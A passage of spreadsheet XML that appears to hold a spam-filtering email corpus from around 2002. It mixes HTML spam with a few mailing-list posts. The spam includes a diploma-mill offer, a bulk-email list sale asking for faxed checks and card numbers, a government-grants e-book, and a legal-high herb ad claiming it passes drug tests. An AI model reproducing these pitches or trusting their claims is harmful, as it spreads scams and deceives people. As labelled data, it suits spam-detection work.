 "Arial, Helvetica, sans-serif" size=3D2&gt;&lt;U&gt;YOUR BILLS&lt;/U&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/TD&gt;&lt;=
 TD width=3D62&gt;&lt;DIV align=3Dcenter&gt;&lt;B&gt;&lt;FONT face=3D"Arial, Helvetica, sans-=
 serif" size=3D2&gt;&lt;U&gt;BALANCE&lt;/U&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;TD width=3D72&gt;&lt;DIV al=
 ign=3Dright&gt;&lt;B&gt;&lt;FONT face=3D"Arial, Helvetica, sans-serif" size=3D2&gt;&lt;U&gt;PAY=
 MENT&lt;/U&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD width=3D90&gt;&lt;FONT face=3D"Arial,=
  Helvetica, sans-serif"&gt;MasterCard&lt;/FONT&gt;&lt;/TD&gt;&lt;TD width=3D62&gt;&lt;DIV align=3D=
 right&gt;&lt;FONT face=3D"Arial, Helvetica, sans-serif"&gt;$8,750&lt;/FONT&gt;&lt;/DIV&gt;&lt;/TD&gt;=
 &lt;TD width=3D72&gt;&lt;P align=3Dright&gt;&lt;FONT face=3D"Arial, Helvetica, sans-serif=
 "&gt;$175&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD width=3D90&gt;&lt;FONT face=3D"Arial, Helveti=
 ca, sans-serif"&gt;Visa&lt;/FONT&gt;&lt;/TD&gt;&lt;TD width=3D62&gt;&lt;DIV align=3Dright&gt;&lt;FONT fa=
 ce=3D"Arial, Helvetica, sans-serif"&gt;$10,500&lt;/FONT&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;TD width=3D7=
 2&gt;&lt;DIV align=3Dright&gt;&lt;FONT face=3D"Arial, Helvetica, sans-serif"&gt;$210&lt;/FON=
 T&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD width=3D90&gt;&lt;FONT face=3D"Arial, Helvetica, sans-=
 serif"&gt;Discover&lt;/FONT&gt;&lt;/TD&gt;&lt;TD width=3D62&gt;&lt;DIV align=3Dright&gt;&lt;FONT face=3D=
 "Arial, Helvetica, sans-serif"&gt;$5,250&lt;/FONT&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;TD width=3D72&gt;&lt;DIV=
  align=3Dright&gt;&lt;FONT face=3D"Arial, Helvetica, sans-serif"&gt;$105&lt;/FONT&gt;&lt;/DI=
 V&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD width=3D90&gt;&lt;FONT face=3D"Arial, Helvetica, sans-serif"=
 &gt;Auto Loan&lt;/FONT&gt;&lt;/TD&gt;&lt;TD width=3D62&gt;&lt;DIV align=3Dright&gt;&lt;FONT face=3D"Aria=
 l, Helvetica, sans-serif"&gt;$20,500&lt;/FONT&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;TD width=3D72&gt;&lt;DIV ali=
 gn=3Dright&gt;&lt;FONT face=3D"Arial, Helvetica, sans-serif"&gt;$515&lt;/FONT&gt;&lt;/DIV&gt;&lt;/=
 TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD colSpan=3D3&gt;&lt;HR&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD width=3D90&gt;&lt;B&gt;&lt;FONT face=
 =3D"Arial, Helvetica, sans-serif" size=3D4&gt;TOTAL&lt;/FONT&gt;&lt;/B&gt;&lt;/TD&gt;&lt;TD width=3D=
 62&gt;&lt;DIV align=3Dright&gt;&lt;B&gt;&lt;FONT face=3D"Arial, Helvetica, sans-serif" size=3D=
 4&gt;$45,000&lt;/FONT&gt;&lt;/B&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;TD width=3D72&gt;&lt;DIV align=3Dright&gt;&lt;B&gt;&lt;FONT =
 face=3D"Arial, Helvetica, sans-serif" size=3D4&gt;$1,005&lt;/FONT&gt;&lt;/B&gt;&lt;/DIV&gt;&lt;/TD=
 &gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;BR&gt;&lt;BR&gt;&lt;TABLE cellSpacing=3D0 cellPadding=3D5 width=
 =3D263 border=3D0&gt;&lt;TBODY&gt;&lt;TR&gt;&lt;TD colSpan=3D3&gt;&lt;DIV align=3Dcenter&gt;&lt;FONT col=
 or=3D#0066cc&gt;&lt;B&gt;&lt;FONT face=3D"Arial, Helvetica, sans-serif" size=3D5&gt;INTO =
 THIS !!!&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD width=3D84&gt;&lt;B&gt;&lt;/B&gt;&lt;/TD&gt;&lt;=
 TD width=3D71&gt;&lt;DIV align=3Dcenter&gt;&lt;B&gt;&lt;FONT face=3D"Arial, Helvetica, sans-=
 serif" size=3D2&gt;&lt;U&gt;BALANCE&lt;/U&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;TD width=3D78&gt;&lt;DIV al=
 ign=3Dright&gt;&lt;B&gt;&lt;FONT face=3D"Arial, Helvetica, sans-serif" size=3D2&gt;&lt;U&gt;PAY=
 MENT&lt;/U&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD width=3D84&gt;&lt;B&gt;&lt;FONT face=3D"Ari=
 al, Helvetica, sans-serif" size=3D4&gt;TOTAL&lt;/FONT&gt;&lt;/B&gt;&lt;/TD&gt;&lt;TD width=3D71&gt;&lt;D=
 IV align=3Dright&gt;&lt;B&gt;&lt;FONT face=3D"Arial, Helvetica, sans-serif" size=3D4&gt;$=
 45,000&lt;/FONT&gt;&lt;/B&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;TD width=3D78&gt;&lt;DIV align=3Dright&gt;&lt;B&gt;&lt;FONT fac=
 e=3D"Arial, Helvetica, sans-serif" size=3D4&gt;$390.06&lt;/FONT&gt;&lt;/B&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;=
 /TR&gt;&lt;TR&gt;&lt;TD colSpan=3D3&gt;&lt;DIV align=3Dcenter&gt;&lt;FONT face=3D"Arial, Helvetica=
 , sans-serif" color=3D#ff0000&gt;&lt;B&gt;Annual Savings: $7,379.00&lt;BR&gt;5-year Savin=
 gs: $36,896.00&lt;/B&gt;&lt;/FONT&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;P&gt;&amp;nbsp;&lt;/P&gt;&lt;/TD=
 &gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD width=3D2%&gt;&lt;B&gt;o&lt;/B&gt;&lt;/TD&gt;&lt;TD width=3D57%&gt;&lt;FONT face=3D"Arial,=
  Helvetica, sans-serif"&gt;Pay off high interest credit cards&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR=
 &gt;&lt;TR&gt;&lt;TD width=3D2%&gt;&lt;B&gt;o&lt;/B&gt;&lt;/TD&gt;&lt;TD width=3D57%&gt;&lt;FONT face=3D"Arial, Helv=
 etica, sans-serif"&gt;Reduce monthly payments&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD colSpan=
 =3D2&gt;&amp;nbsp;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD colSpan=3D2&gt;&lt;B&gt;&lt;FONT face=3D"Arial, Helvetica=
 , sans-serif"&gt;&lt;A href=3Dhttp://www.wannaberich.net/mortgage/&gt;HOME IMPROVEM=
 ENT&lt;/A&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD width=3D2%&gt;&lt;B&gt;o&lt;/B&gt;&lt;/TD&gt;&lt;TD width=3D57=
 %&gt;&lt;FONT face=3D"Arial, Helvetica, sans-serif"&gt;Paint, landscape, carpet, ad=
 d rooms/pool/spa&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD width=3D2%&gt;&lt;B&gt;o&lt;/B&gt;&lt;/TD&gt;&lt;TD width=
 =3D57%&gt;&lt;FONT face=3D"Arial, Helvetica, sans-serif"&gt;You may be eligible for=
  a tax deduction&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD colSpan=3D2&gt;&lt;P&gt;&amp;nbsp;&lt;/P&gt;&lt;/TD&gt;&lt;/T=
 R&gt;&lt;TR&gt;&lt;TD colSpan=3D2&gt;&lt;FONT face=3D"Arial, Helvetica, sans-serif"&gt;&lt;B&gt;&lt;A hr=
 ef=3Dhttp://www.wannaberich.net/mortgage/&gt;HOME REFINANCING&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;=
 /TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD width=3D2%&gt;&lt;B&gt;o&lt;/B&gt;&lt;/TD&gt;&lt;TD width=3D57%&gt;&lt;FONT face=3D"Ari=
 al, Helvetica, sans-serif"&gt;Reduce your monthly payments and get cash back!=
 &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD vAlign=3Dtop width=3D2% height=3D19&gt;&lt;B&gt;o&lt;/B&gt;&lt;FONT=
  face=3D"Arial, Helvetica, sans-serif"&gt;&lt;B&gt;&lt;FONT color=3D#0066cc&gt;&lt;BR&gt;&lt;/FONT=
 &gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD width=3D57% height=3D19&gt;&lt;FONT face=3D"Arial, Helvetic=
 a, sans-serif"&gt;Get up to 125% of your homes value (ratios vary by
 state).&lt;=
 /FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD colSpan=3D2&gt;&lt;FONT face=3D"Arial, Helvetica, sans-s=
 erif"&gt;&lt;B&gt;&lt;FONT color=3D#0066cc&gt;We have hundreds of loan programs, includin=
 g:&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;UL&gt;&lt;LI&gt;&lt;FONT face=3D"Arial, Helvetica, sans-serif"&gt;Pu=
 rchase Loans&lt;/FONT&gt;&lt;LI&gt;&lt;FONT face=3D"Arial, Helvetica, sans-serif"&gt;Refinan=
 ce&lt;/FONT&gt;&lt;LI&gt;&lt;FONT face=3D"Arial, Helvetica, sans-serif"&gt;Debt Consolidatio=
 n&lt;/FONT&gt;&lt;LI&gt;&lt;FONT face=3D"Arial, Helvetica, sans-serif"&gt;Home Improvement&lt;/=
 FONT&gt;&lt;LI&gt;&lt;FONT face=3D"Arial, Helvetica, sans-serif"&gt;Second s&lt;/FONT&gt;&lt;LI&gt;&lt;F=
 ONT face=3D"Arial, Helvetica, sans-serif"&gt;No Income Verification&lt;/FONT&gt;&lt;/L=
 I&gt;&lt;/UL&gt;&lt;P&gt;&lt;B&gt;&lt;FONT face=3D"Arial, Helvetica, sans-serif" color=3D#0066cc&gt;N=
 o matter which of our 50 states you live in, we&lt;BR&gt;likely have a program t=
 hat could meet your needs!&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;HR&gt;&lt;P&gt;=
 &lt;B&gt;&lt;FONT face=3D"Arial, Helvetica, sans-serif" size=3D4&gt;Please
 &lt;A href=3Dh=
 ttp://www.wannaberich.net/mortgage/&gt;CLICK HERE&lt;/A&gt;&lt;/FONT&gt;&lt;FONT face=3D"Ari=
 al, Helvetica, sans-serif" size=3D2&gt;&lt;BR&gt;One of our experienced loan office=
 rs will contact you
 for more details concerning your needs.&lt;/FONT&gt;&lt;/B&gt;&lt;BR&gt;=
 &lt;/P&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;br&gt;&lt;HR&gt;&lt;FON=
 T COLOR=3D#FFFF99&gt;&lt;BR&gt;&lt;FONT face=3DArial size=3D1&gt;Want to be purged? &lt;A HR=
 EF=3Dhttp://www.wannaberich.net/&gt;Just go here&lt;/A&gt;and we will promptly extr=
 act you. copyright DTI Inc.&lt;/FONT&gt;&lt;/FONT&gt;&lt;/DIV&gt;&lt;FONT size=3D2 Arial&gt;&lt;/BLOC=
 KQUOTE&gt;&lt;/FONT&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Announcing Herbal Smoking Alternatives
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;/HEAD&gt;
 &lt;BODY&gt;
 &lt;TABLE WIDTH=3D400 BORDER=3D0 CELLPADDING=3D0 CELLSPACING=3D0&gt;
     &lt;TR&gt;
       &lt;TD ALIGN=3D"LEFT" VALIGN=3D"TOP"&gt;
 	  &lt;FONT FACE=3D"Tahoma, Arial, Verdana" SIZE=3D2&gt;
 	  &lt;H2&gt;&lt;FONT COLOR=3D"#FF0000"&gt;GET HIGH...LEGALLY!&lt;/FONT&gt;&lt;/H2&gt;
 	  &lt;B&gt;IT REALLY WORKS!&lt;BR&gt;
 	  PASSES ALL DRUG TESTS!&lt;BR&gt;
 	  EXTREMELY POTENT!
 	  &lt;P&gt;
 	  &lt;A HREF=3D"http://65.123.227.175/salvia.html"&gt;CLICK HERE for more info =
 on Salvia Divinorum&lt;/A&gt;
 	  &lt;P&gt;
 	  &lt;A HREF=3D"http://65.123.227.175/5x.html"&gt;CLICK HERE for SALVIA 5X EXTR=
 ACT!&lt;/A&gt; &lt;BR&gt;&lt;FONT COLOR=3D"#FF0000"&gt;WARNING...VERY POTENT!&lt;/FONT&gt;
 	  &lt;P&gt;
 	  &lt;A HREF=3D"http://65.123.227.175/13x.html"&gt;CLICK HERE for SALVIA 13X&lt;/A=
 &gt;. The most POTENT, LEGAL, SMOKABLE herb on the planet! 13 times the power=
  of Salvia Divinorum!&lt;BR&gt;&lt;FONT COLOR=3D"#FF0000"&gt;WARNING...EXTREMELY POTEN=
 T!&lt;/FONT&gt;
 &lt;P&gt;&lt;BR&gt;&lt;/B&gt;
 Disclaimer:&lt;BR&gt;
 We are strongly against sending unsolicited emails to those who do not wis=
 h 
 to receive our special mailings. You have opted in to one or more of our 
 affiliate sites requesting to be notified of any special offers we may run=
 from time to time. We also have attained the services of an independent 3r=
 d 
 party to overlook list management and removal services. This is NOT 
 unsolicited email. If you do not wish to receive further mailings, please 
 &lt;A HREF=3D"http://65.123.227.175/remove.html"&gt;click here to be removed fro=
 m the list&lt;/A&gt;. 
 Please accept our apologies if you have been sent this email in error. We 
 honor all removal requests.	  
 	  &lt;/FONT&gt;
 	  &lt;/TD&gt;    &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">
 ----- Original Message ----- 
 From: "Gary Lawrence Murphy" &lt;garym@canada.com&gt;
 &gt; 
 &gt;     f&gt; What about a situation where you don't directly ask/talk to the
 &gt;     f&gt; bot, but they listen in and advise/correct/interject/etc?
 &gt; 
 &gt; Do you do that?  Do you hear two people at the next table say "I'm
 &gt; going to Seattle tomorrow" and you just /have/ to lean over and
 &gt; interject compulsively to tell them what you know about Seattle's
 &gt; weather?
 Have you ever worked with Kragen?
</t>
  </si>
  <si>
    <t xml:space="preserve">Gary Lawrence Murphy:
 &gt;Back before they had such clever software, I used to hunt spammers like 
 &gt;swamp-rats ..
 Good for you! You did the world a favor. Personally,
 I wouldn't know where to hide the bodies. But if
 the government didn't have this -- um, fussiness --
 about shooting vermin, the spam problem would
 disappear rather quickly.
 _________________________________________________________________
 Chat with friends online, try MSN Messenger: http://messenger.msn.com
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">"Adam L. Beberg" &lt;beberg@mithral.com&gt; writes:
 &gt; &gt; VCs don't care about the success of the venture or the jobs of those
 &gt; &gt; involved in it, they aren't "funding innovation" or stimulating growth
 &gt; &gt; or fueling the economy.
 &gt; 
 &gt; Possibly replace "own" with "take from you ASAP with dilution". Their goal
 &gt; is to take what you have by any means nessecary and sell it to someone else
 &gt; for more then they paid within 7 years or less. That's what they do, nice
 &gt; and simple. Your based-on-GPL-thing gives them no way to do that, so you are
 &gt; irrelivant to the VC/investment world.
 Interestingly, it was the VC that convinced Zope Corp. to go opensource.
 -- 
 Karl Anderson      kra@monkey.org           http://www.monkey.org/~kra/
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
 ------=_MTVdUUF7_CFi9V3vL_MA
 Content-Type: text/plain
 Content-Transfer-Encoding: quoted-printable
 X-MIME-Autoconverted: from 8bit to quoted-printable by mail1.acecape.com id g6MGZJ5S018050
 Dear Reader,
 How has Veuve Clicquot's sponsorship become so successful? Naomi Hancock,=
 =20
 UK PR Manager, tells us all about it in an exclusive interview. Also read=
 =20
 about the launch of SponsorRating, the first sponsorship rating agency,=20
 our unsual transactions of the month, and a "special X-treme" Sponsorship=
 =20
 Alert.
 As this is the last issue for the summer, we wish you a good August and=20
 will be back in September.
 Your comments are always welcome, so please email us at=20
 news@sponsorclick.com.
 All our best,
 Rachael Mark
 Editor
 In this issue:
       1. Sponsorship, How and Why? Veuve Clicquot Speaks=20
       2. Press Release: SponsorClick Launches the First Sponsorship Ratin=
 g=20
 Agency
       3. Unusual Transactions of the Month
       4. Sponsorship Alert Special X-treme
       5. Special Offers: Taylor Nelson Sofr=E8s, BVA, Sport+Markt,=20
 Mediametrie, and more
       6. More Matching Opportunities With SponsorClick
       7. How to Contact SponsorClick?
 =20
 =20
 ---------------------------------------------------------------------=20
 .1. Sponsorship, How and Why? Veuve Clicquot Speaks=20
     Interview with Naomi Hancock, PR Manager, Veuve Clicquot UK - July 10=
 ,=20
 2002
 ---------------------------------------------------------------------=20
 =20
   On the occasion of the Veuve Clicquot Gold Cup Polo in West Sussex,=20
 Naomi Hancock reveals Veuve Clicquot's communication strategy.=20
 =20
 Veuve Clicquot has had a single consistent communication strategy in the=20
 UK for the last 15 years. This has been to associate the brand with the=20
 most glamorous sporting cultural and social events of the English summer =
 -=20
 known locally as The English Season.=20
 Veuve Clicquot has become the Champagne of the Season. We've adapted our=20
 communication to stay at the forefront of fashion, and attitudes to these=
 =20
 events, which combine tradition with the excitement of world class sport.=
 =20
   Does your company consider sponsorship a key marketing/communication=20
 tool?
 Absolutely. Sponsorship enables us to build positive associations for the=
 =20
 brand. But we are not interested in tacking our name onto an event where=20
 the addition does not add real value to the event and vica-versa. We=20
 believe in investing, nurturing, and improving over time.=20
   Can you describe your sponsorship strategy?
 We aim to maximise the perception of Veuve Clicquot as the Champagne of=20
 the Season. Everything we do is designed to build a partnership, and=20
 enhance the valuable efforts of our partners, in their own creation, and=20
 development of their events. Our buzz word is integration, as we seek to=20
 make The Season central to our marketing mix.=20
   Can you describe your sponsorship decision-making process?
 We usually discuss a sponsorship programme for the full year with our=20
 mother company in France. We have flexibility - within our budget and the=
 =20
 frame of The Season - to undertake what we sense to match our values and=20
 the image of Veuve Clicquot. Our role in London is to screen whatever=20
 comes to us and discuss relevant operations internally.
 We have a dedicated PR Group at Veuve Clicquot which makes all decisions=20
 related to our sponsorship. Above a certain threshold our head-office wil=
 l=20
 like to be involved in such a decision.=20
   What are the main criteria on which you base your sponsorship strategy?
 Return on investment is the key criterion for any marketing investment=20
 decision. We would only undertake sponsorship in Season-related events.=20
 This is our rule and frame of investment.
   What objectives are you seeking to achieve through sponsorship?
 Within the Season, we are especially looking to achieve visibility vis-=E0=
 -
 vis our audience, image-transfer, media coverage (all national press,=20
 magazine of all kinds).=20
 Awareness is also key for Veuve Clicquot, so we look to find events that=20
 complement those that we already have, and extend our appeal to people of=
 =20
 similar status, but differing interests.=20
   Please describe one of your sponsorships
 The Eighth Annual Veuve Clicquot Gold Cup Polo, held this month at Cowdra=
 y=20
 Park in West Sussex, is the largest entertainment operation undertaken by=
 =20
 Veuve Clicquot UK each year. This successful sponsorship earns Veuve=20
 Clicquot tremendous media coverage, fabulous exposure to our core target=20
 group and a perfect image transfer as polo is the sports of kings and the=
 =20
 king of sports.
   What's your approximate sponsorship spend per year?
 Significant. Without giving figures, we can say that we spend a large=20
 portion of our communication in sponsorship and support and that we=20
 organize the majority of our communication around the theme of Veuve=20
 Clicquot as the Champagne of the Season, because this is where we are=20
 getting a good return on our investment.
   How do you measure the effectiveness of your sponsorship?
 ------=_MTVdUUF7_CFi9V3vL_MA--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</si>
  <si>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How about obtaining a fully recognized University Degree? 231175433222211111111
</t>
  </si>
  <si>
    <t xml:space="preserve">Obtain a prosperous future, money earning power,
 and the admiration of all.
 Degrees from Prestigious Accredited
 Universities based on your present knowledge
 and life experience.
 CALL NOW to receive your diploma
 within days!!!
 1  425  790  3463
 No required tests, classes, books, or interviews.
 Bachelors, masters, MBA, and doctorate (PhD)
 diplomas available in the field of your choice.
 No one is turned down.
 Confidentiality assured.
 CALL NOW to receive your diploma
 within days!!!
 1  425  790  3463
 Call 24 hours a day, 7 days a week, including
 Sundays and holidays.
 231175433222211111111
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Today's Special: Amazing Penetrations No. 17 29264
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ~`~ Increase Your Sales by 100%
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Consumers, Increase your Business Sales! 
 How??
 By targeting millions of buyers via e-mail !! 
 25 MILLION EMAILS + Bulk Mailing Software For Only $150.00
 super low price! ACT NOW !!!
 Our Fresh Addresses Will Bring You 
 Incredible Results!
 If you REALLY want to get the word out regarding
 your services or products, Bulk Email is the BEST 
 way to do so, PERIOD! Advertising in newsgroups is 
 good but you're competing with hundreds even THOUSANDS
 of other ads. Will your customer's see YOUR ad in the 
 midst of all the others?
 Free Classifieds? (Don't work)
 Web Site? (Takes thousands of visitors)
 Banners? (Expensive and iffy)
 E-Zine? (They better have a huge list)
 Search Engines? (Easily buried with thousands of others)
 Bulk Email will allow you to DIRECTLY contact your
 potential customers. They are much more likely to
 take the time to read about what you have to offer 
 if it was as easy as reading it via email rather
 than searching through countless postings in 
 newsgroups.
 The list's are divided into groups and are compressed. 
 This will allow you to use the names right off the cd. 
 ORDER IN THE NEXT 72 hours AND RECIEVE 4 BONUSES!!
 ORDER IN THE NEXT 48 HOURS AND RECIEVE FULL TECHNICAL SUPPORT !!!
 ACT NOW !!!!!!!!!!!!!!
 *BONUS #1 Receive an additional cd-rom with millions of fresh, 
 deliverable general internet e-mail addresses free!! 
 *BONUS #2 Receive 2000 how to books, reports and manuals on cd-rom with
 reprint resale rights! Produce for pennies and resell for BIG dollars! 
 *BONUS #3 Receive the Mass Mailer bulk delivery software, with full
 operating instructions. This software will get the mail out QUICK! 
 *BONUS #4 Receive the Informational Guide to bulk e-mail. This guide 
 will give you all the information you need to get started! 
 THIS IS A ONE TIME PACKAGE DEAL WORTH HUNDREDS OF DOLLARS!! 
 ACT NOW! THIS IS A LIMITED TIME OFFER! ORDER WHILE SUPPLIES LAST! 
 RECEIVE THIS DREAM PACKAGE FOR THE UNBELIEVABLE LOW, LOW PRICE OF 
 ONLY $150.00
 ORDERING INFORMATION:
 CHECK BY FAX SERVICES OR CREDIT CARD INFO: 
 O R D E R N O W . . . SAME DAY SERVICE (M-F) if your order
 is received before 3pm Central . To place an order, you can call us at: 
 1-308-650-5905 ext 121 Are fax your order to 1-415-873-2700 
 This Number is for credit Card Orders Only!!!
 CHECK BY FAX SERVICES!
 __________________________________________
 To order, via credit card simply cut/paste and print out the
 EZ ORDER FORM below and fax to our office today.
 ***** NOW ONLY $150! *****
 This "Special Price" is in effect for the next seven days,
 after that we go back to our regular price of $250.00 ...
 Don't delay... you can be in business tomorrow! 
 We accept Visa, Mastercard, Amex, Disc and Checks by Fax.
 ----------------------Cut &amp; Paste----------------------
 ---------------------EZ Order Form---------------------
 _____Yes! I want everything! I am ordering within 72 hours.
 Include my FREE "Business On A Disk" bonus along with your 
 Millions of E-Mail addresses on CD (plus 1,093,808 bonus addresses)
 for the special price of only $150.00 + shipping as indicated
 below.
 _____Yes! I missed the 72 hour special, but I am ordering
 CD WITH, super clean e-mail addresses within 7 days for the
 "special" price of only $250.00 + s&amp;h.
 _____Oop's I missed the 72 hour and 7 day "specials". I am
 ordering The Cd at the regular price of $250.00 + s&amp;h.
 ***PLEASE SELECT YOUR SHIPPING OPTION***
 ____I would like to receive my package FedEx OVERNIGHT. I am
 including $15 for shipping. (Hawaii &amp; Alaska $20 - Canada $25,
 all other International add an *additional* $25 [$40 total] for shipping)
 ____I would like to receive my package FedEx 2 DAY delivery.
 I'm including $10 for shipping. (Sorry no Canada or International
 delivery - Continental U.S. shipping addresses only)
 ***Please Print Carefully***
 NOTE: Orders cannot be shipped without complete information
 including your signature. No exceptions!
 NAME____________________________________________________
 COMPANY NAME____________________________________________
 ADDRESS_________________________________________________
 (FedEx can only ship to street addresses - no P.O. boxes)
 CITY, STATE, ZIP________________________________________
 PHONE NUMBER____________________________________________
 (required for shipping &amp; tracking) 
 EMAIL ADDRESS___________________________________________
 (Print Carefully - required in case we have a question and to
 send you a confirmation that your order has been shipped and for 
 technical support if you order within 24 hrs) 
 TYPE OF CREDIT CARD:
 ______VISA _____MASTERCARD ______AMEX ______DISC
 CREDIT CARD# __________________________________________
 EXPIRATION DATE________________________________________
 NAME ON CARD___________________________________________
 TOTAL AMOUNT (Including Shipping): $___________________
 DATE:x__________________
 (Required) SIGNATURE:x_________________________________
 I understand that I am purchasing the e-mail address on CD,
 and authorize the above charge to my credit card, the addresses are not rented, 
 but are mine to use for my own mailing, over-and-over. Free bonuses are included, 
 but cannot be considered part of the financial transaction. I understand that it 
 is my responsibility to comply with any laws applicable to my local area. As with 
 all software, once opened the CD may not be returned, however, if found defective 
 it will be replaced with like product at no charge.
 O R D E R N O W . . . SAME DAY SERVICE (M-F) if your order
 is received before 3pm Central . To place an order, you can call us at: 
 1-308-650-5905 ext 121 Are fax your order to1-415-873-2700 
 This Number is for credit Card Orders Only!!!
 CHECK BY FAX SERVICES!
 If you would like to fax a check, paste your check below and fax it to our office 
 along with the EZ Order Form forms to: 1-415-873-2700 
 **********************************************************
 ***24 HOUR FAX SERVICES*** PLEASE PASTE YOUR
 CHECK HERE AND FAX IT TO US AT 1-415-873-2700 
 **********************************************************
 If You fax a check, there is no need for you to mail the
 original. We will draft a new check, with the exact
 information from your original check. All checks will be
 held for bank clearance. (7-10 days) Make payable to: 
 "S.C.I.S"
 -=-=-=-=--=-=-=-=-=-=-=offlist Instructions=-=-=-=-=-=-=-=-=-=-=-=
 **************************************************************
 Do not reply to this message - 
 mailto:nomomail@flashmail.com?Subject=offnowc
 **************************************************************
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Never Repay Cash Grants, $500 - $50,000, Secret Revealed!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;xbody&gt;
 &lt;hr width = "100%"&gt;
 &lt;center&gt;&lt;h3&gt;&lt;font color =
 "#44C300"&gt;&lt;b&gt;Government Grants E-Book 2002
 edition, Just $15.95. Summer Sale, Good Until August 10, 2002!  Was $49.95.&lt;/font&gt;&lt;/b&gt;&lt;p&gt;
 &lt;table&gt;&lt;Tr&gt;&lt;td&gt;
 &lt;li&gt;You Can Receive The &lt;font color =
 "green"&gt;&lt;b&gt;Money&lt;/b&gt;&lt;/font&gt; You Need...
 &lt;li&gt;Every day &lt;b&gt;&lt;font color = "green"&gt;millions of
 dollars&lt;/font&gt;&lt;/b&gt; are given away to people, just like
 you!!
 &lt;li&gt;Your Government spends &lt;b&gt;&lt;font color =
 "green"&gt;billions&lt;/font&gt;&lt;/b&gt; of tax dollars on
 government grants.
 &lt;li&gt;Do you know that private foundations, trust and
 corporations are
 &lt;li&gt;required to give away a portion of theirs assets.
 It doesn't matter,
 &lt;li&gt;where you live (USA ONLY), your employment status,
 or if you are broke, retired
 &lt;li&gt;or living on a fixed income. There may be a grant
 for you!
 &lt;hr width = "100%"&gt;
 &lt;li&gt;&lt;font color = "red"&gt;&lt;b&gt;ANYONE&lt;/b&gt;&lt;/font&gt; can apply
 for a Grant from 18 years old and up!
 &lt;li&gt;We will show you HOW &amp; WHERE to get Grants. &lt;font
 color = "red"&gt;&lt;b&gt;THIS BOOK IS NEWLY UPDATED WITH THE
 MOST CURRENT INFORMATION!!!&lt;/b&gt;&lt;/font&gt;
 &lt;li&gt;Grants from $500.00 to $50,000.00 are possible!
 &lt;li&gt;GRANTS don't have to be paid back, EVER!
 &lt;li&gt;Grants can be ideal for people who are or were
 bankrupt or just have bad credit.
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;br&gt;&lt;font size = "+1"&gt;Please Visit Our
 Website&lt;p&gt;&lt;/font&gt;
 And Place Your &lt;font color = "red"&gt; &lt;b&gt;Order
 TODAY!&lt;/b&gt; &lt;/font&gt;&lt;a target="_blank"  href =
 "http://www.geocities.com/grantzone_2002/" &gt;&lt;b&gt;&lt;font
 size="5"&gt;CLICK HERE&lt;/font&gt;&lt;/b&gt; &lt;/a&gt;&lt;p&gt;&amp;nbsp;&lt;p&gt;
 To Order by postal mail, please send $15.95 Plus $4.00 S &amp; H. &lt;br&gt;
